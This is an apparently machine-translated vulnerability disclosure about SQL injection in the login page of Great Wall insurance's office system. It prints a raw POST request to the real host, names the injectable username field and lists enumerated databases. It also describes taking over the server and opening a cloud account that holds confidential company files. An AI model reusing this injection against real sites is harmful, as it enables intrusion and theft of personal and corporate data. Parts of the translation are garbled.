A website vulnerability in Great Wall insurance (resulting in leakage of a large amount of confidential information)

A website vulnerability in Great Wall insurance (resulting in leakage of a large amount of confidential information)

Similar to previous site vulnerabilities, but not in the same location, not repeated vulnerabilities ~~~

Http://oa.ccib.com.cn/login.asp

Post injection on the login page:
 

POST /LoginType.asp HTTP/1.1Host: oa.ccib.com.cnContent-Length: 70Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://oa.ccib.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) hrome/47.0.2526.106 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://oa.ccib.com.cn/login.aspAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.8Cookie: ASPSESSIONIDASBSDCBR=DDIJGEODBIEDENPJDPPBLKPMDigest=&urlFrom=&username=admin&password=admin&submit1=+%B5%C7+%C2%BC+

Username Injection
 

Six databases: not used
 

available databases [6]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb

 

It seems you can win the server directly.
 

 

We can see that the master station is also on this server, so the master station also won
 
There was no data in the database, but an unexpected error occurred:

When I opened my computer, I found that Baidu cloud exists. By default, I opened it directly:
 

In addition to the user's personal information, all of them are confidential information of the enterprise.
 

 

So far, no data is obtained.

Solution:

20rank ~~~